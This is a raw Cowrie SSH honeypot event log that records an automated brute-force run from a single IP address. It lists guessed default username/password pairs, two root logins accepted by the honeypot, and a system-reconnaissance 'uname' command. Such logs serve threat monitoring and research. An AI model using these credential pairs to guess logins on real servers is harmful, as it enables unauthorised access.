{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:49.720676Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:35:50.274030Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:35:50.412803Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:35:50.413526Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:50.464602Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:50.465597Z","src_ip":"212.227.125.160","session":"566337133345"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47770,"dst_ip":"1.2.3.4","dst_port":22,"session":"a774106d4e61","protocol":"ssh","message":"New connection: 212.227.125.160:47770 (1.2.3.4:22) [session: a774106d4e61]","sensor":"my-vps","timestamp":"2025-08-26T21:35:55.400993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:55.404024Z","src_ip":"212.227.125.160","session":"a774106d4e61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:35:55.452378Z","src_ip":"212.227.125.160","session":"a774106d4e61"}
{"eventid":"cowrie.login.failed","username":"pufferpanel","password":"pufferpanel","message":"login attempt [pufferpanel/pufferpanel] failed","sensor":"my-vps","timestamp":"2025-08-26T21:35:55.655926Z","src_ip":"212.227.125.160","session":"a774106d4e61"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:35:56.709147Z","src_ip":"212.227.125.160","session":"a774106d4e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43160,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0766369bd0b","protocol":"ssh","message":"New connection: 212.227.125.160:43160 (1.2.3.4:22) [session: c0766369bd0b]","sensor":"my-vps","timestamp":"2025-08-26T21:36:01.209547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:01.267051Z","src_ip":"212.227.125.160","session":"c0766369bd0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:01.267823Z","src_ip":"212.227.125.160","session":"c0766369bd0b"}
{"eventid":"cowrie.login.failed","username":"testuser1","password":"testuser1","message":"login attempt [testuser1/testuser1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:01.668279Z","src_ip":"212.227.125.160","session":"c0766369bd0b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:02.758279Z","src_ip":"212.227.125.160","session":"c0766369bd0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38548,"dst_ip":"1.2.3.4","dst_port":22,"session":"1daf1d10ed89","protocol":"ssh","message":"New connection: 212.227.125.160:38548 (1.2.3.4:22) [session: 1daf1d10ed89]","sensor":"my-vps","timestamp":"2025-08-26T21:36:07.255352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:07.256400Z","src_ip":"212.227.125.160","session":"1daf1d10ed89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:07.358583Z","src_ip":"212.227.125.160","session":"1daf1d10ed89"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:07.536748Z","src_ip":"212.227.125.160","session":"1daf1d10ed89"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:08.745278Z","src_ip":"212.227.125.160","session":"1daf1d10ed89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33934,"dst_ip":"1.2.3.4","dst_port":22,"session":"5194f0496677","protocol":"ssh","message":"New connection: 212.227.125.160:33934 (1.2.3.4:22) [session: 5194f0496677]","sensor":"my-vps","timestamp":"2025-08-26T21:36:12.869419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:12.880685Z","src_ip":"212.227.125.160","session":"5194f0496677"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:12.965076Z","src_ip":"212.227.125.160","session":"5194f0496677"}
{"eventid":"cowrie.login.failed","username":"rajesh","password":"rajesh","message":"login attempt [rajesh/rajesh] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:13.209839Z","src_ip":"212.227.125.160","session":"5194f0496677"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:14.308933Z","src_ip":"212.227.125.160","session":"5194f0496677"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57554,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f2ebc85fbf1","protocol":"ssh","message":"New connection: 212.227.125.160:57554 (1.2.3.4:22) [session: 2f2ebc85fbf1]","sensor":"my-vps","timestamp":"2025-08-26T21:36:18.401546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:18.421212Z","src_ip":"212.227.125.160","session":"2f2ebc85fbf1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:18.488878Z","src_ip":"212.227.125.160","session":"2f2ebc85fbf1"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:18.785152Z","src_ip":"212.227.125.160","session":"2f2ebc85fbf1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:19.837262Z","src_ip":"212.227.125.160","session":"2f2ebc85fbf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52942,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b84eb22486c","protocol":"ssh","message":"New connection: 212.227.125.160:52942 (1.2.3.4:22) [session: 4b84eb22486c]","sensor":"my-vps","timestamp":"2025-08-26T21:36:24.070056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:24.070937Z","src_ip":"212.227.125.160","session":"4b84eb22486c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:24.120687Z","src_ip":"212.227.125.160","session":"4b84eb22486c"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"ec2-user","message":"login attempt [ec2-user/ec2-user] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:24.285929Z","src_ip":"212.227.125.160","session":"4b84eb22486c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:25.351294Z","src_ip":"212.227.125.160","session":"4b84eb22486c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48330,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fc45317b796","protocol":"ssh","message":"New connection: 212.227.125.160:48330 (1.2.3.4:22) [session: 9fc45317b796]","sensor":"my-vps","timestamp":"2025-08-26T21:36:29.642570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:29.646476Z","src_ip":"212.227.125.160","session":"9fc45317b796"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:29.687949Z","src_ip":"212.227.125.160","session":"9fc45317b796"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:29.874007Z","src_ip":"212.227.125.160","session":"9fc45317b796"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:30.931487Z","src_ip":"212.227.125.160","session":"9fc45317b796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43716,"dst_ip":"1.2.3.4","dst_port":22,"session":"a75d0150c5a1","protocol":"ssh","message":"New connection: 212.227.125.160:43716 (1.2.3.4:22) [session: a75d0150c5a1]","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.447507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.448409Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.498082Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.649047Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:36:35.768816Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.769465Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.820527Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:35.821686Z","src_ip":"212.227.125.160","session":"a75d0150c5a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39102,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a8d17306867","protocol":"ssh","message":"New connection: 212.227.125.160:39102 (1.2.3.4:22) [session: 7a8d17306867]","sensor":"my-vps","timestamp":"2025-08-26T21:36:40.705627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:40.712236Z","src_ip":"212.227.125.160","session":"7a8d17306867"}
